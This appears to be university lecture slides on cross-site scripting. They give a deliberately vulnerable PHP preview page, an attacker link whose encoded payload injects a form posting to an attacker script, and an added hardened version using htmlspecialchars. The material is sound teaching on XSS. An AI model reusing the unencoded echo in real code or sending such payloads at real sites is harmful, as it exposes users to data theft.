JMU
Cross Site Scripting (XSS)
Vulnerabilities, Attacks, and Mitigations


Prof. David Bernstein
James Madison University

Computer Science Department
bernstdh@jmu.edu


Overview
Phases
Variants of the Vulnerability
Type 0/Local Vulnerabilities

The "Classic" Case - http:// Request to a Server

images/cross-site-scripting_local_http.gif
Type 0/Local Vulnerabilities (cont.)

The "Modern" (e.g., Desktop Widgets, Gadgets, Desklets) Case - file:// Request to the Local File System

images/cross-site-scripting_local_file.gif
Type 0/Local Vulnerabilities (cont.)
A Type 0 Example
Type 1/Reflected Vulnerabilities
images/cross-site-scripting_reflected.gif
Type 1/Reflected Vulnerabilities (cont.)
A Type 1 Example
A Type 1 Example (cont.)

The Code on the Trusted Server

phpexamples/xss/trusted/create.html
<html>
  <body>
    <form action="preview.php" method="GET" name="feedback">
    Enter your message:<br/>
    <textarea name="message" rows="10" cols="80">
    </textarea><br/>
    <input type="submit" value="Preview" />
    </form>
  </body>
</html>
phpexamples/xss/trusted/preview.php
<html>
  <body>
    <p>
    A preview of your message:
    </p>

    <p style="border: 1px solid black">
    <?php
    // Vulnerable on purpose: the request parameter is written into the
    // page with no HTML encoding, so any markup carried in "message" is
    // parsed by the browser. This is the reflected (Type 1) flaw the
    // example demonstrates.
    echo $_GET["message"];
    ?>
    </p>
  </body>
</html>
A Type 1 Example (cont.)

The Trigger Document Containing Malicious Code

phpexamples/xss/attacker/link-attack.html
<html>
  <body>
  <p>
  Click on the following link to send a quick email to a friend.
  </p>
  <a href="../trusted/preview.php?message=Call Me!%3C%2Fp%3E%3Cp%3E%3Cform%20action%3D'..%2Fattacker%2Freceive_secret.php'%20method%3D'POST'%3EEMAIL%20of%20Recipient%3A%20%3Cinput%20type%3D'email' %20name%3D'email'%20%2F%3E%3Cbr%2F%3E%3Cinput%20type%3D'submit'%20value%3D'Send'%20%2F%3E%3C%2Fform%3E">Send</a>
  </body>
</html>
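The preview page above is vulnerable because the value of the message parameter is echoed into the HTML body without encoding, so the link in link-attack.html closes the surrounding paragraph and injects a form that posts to the attacker's server. The following is an added example, not part of the original slides: a hardened preview.php that HTML-encodes the untrusted value with htmlspecialchars before placing it in the page. Run from the command line it decodes the exact query string used by link-attack.html (copied from the link above, including its stray space) and renders it both ways, so the difference is visible without a web server; served by a web server it behaves like the original preview.php. The function names escape_html and render_preview are this example's own.

```php
<?php
// Added example (not from the original slides): hardened replacement for
// preview.php. The original echoes $_GET["message"] unencoded; this one
// encodes it so injected markup is displayed as text, not parsed as HTML.
declare(strict_types=1);

// Encode untrusted text for insertion into an HTML element body.
// ENT_QUOTES also encodes ' and ", so the same encoder is safe inside
// quoted attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 instead
// of returning an empty string.
function escape_html(string $untrusted): string
{
    return htmlspecialchars(
        $untrusted,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
}

// Build the preview page with the same layout as the original preview.php,
// but with the message encoded before it is placed in the <p>.
function render_preview(string $message): string
{
    $safe = escape_html($message);
    return <<<HTML
<html>
  <body>
    <p>
    A preview of your message:
    </p>

    <p style="border: 1px solid black">
    $safe
    </p>
  </body>
</html>
HTML;
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration. Constructed input: the query string from the
    // href in link-attack.html, copied verbatim.
    $query = "message=Call Me!%3C%2Fp%3E%3Cp%3E%3Cform%20action%3D'..%2Fattacker%2Freceive_secret.php'"
           . "%20method%3D'POST'%3EEMAIL%20of%20Recipient%3A%20%3Cinput%20type%3D'email' "
           . "%20name%3D'email'%20%2F%3E%3Cbr%2F%3E%3Cinput%20type%3D'submit'%20value%3D'Send'"
           . "%20%2F%3E%3C%2Fform%3E";
    parse_str($query, $params);
    $message = (string) $params['message'];

    echo "Decoded message, as the vulnerable preview.php would emit it:\n";
    echo $message, "\n\n";

    echo "Hardened preview page:\n";
    $page = render_preview($message);
    echo $page, "\n";

    // The injected <form> must not survive as a tag in the encoded output.
    if (strpos($page, '<form') !== false || strpos($page, '&lt;form') === false) {
        fwrite(STDERR, "encoding failed: injected markup survived\n");
        exit(1);
    }
} else {
    // Served by a web server: same interface as the original preview.php.
    header('Content-Type: text/html; charset=UTF-8');
    echo render_preview($_GET['message'] ?? '');
}
```

Run it with `php preview_hardened.php`: the decoded message shows the closing `</p>` and the attacker's `<form>`, while the hardened page contains `&lt;form ...&gt;` and nothing the browser will execute or submit. The encoder here is correct only for the HTML element and quoted-attribute contexts used on this page; a value placed inside a script block, a URL, or a CSS property needs the encoder for that context instead.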
Type 2/Persistent Vulnerabilities
Type 2/Persistent Vulnerabilities (cont.)
images/cross-site-scripting_persistent.gif
Payload of the Trigger Document
Kinds of Malicious Code
The Location of the Code in the "Dynamic" Document
Obviousness of the Malicious Code in User-Initiated GET Requests
Mitigation During Design
Mitigation During Implementation
Mitigation During Validation/Verification
Mitigation During Deployment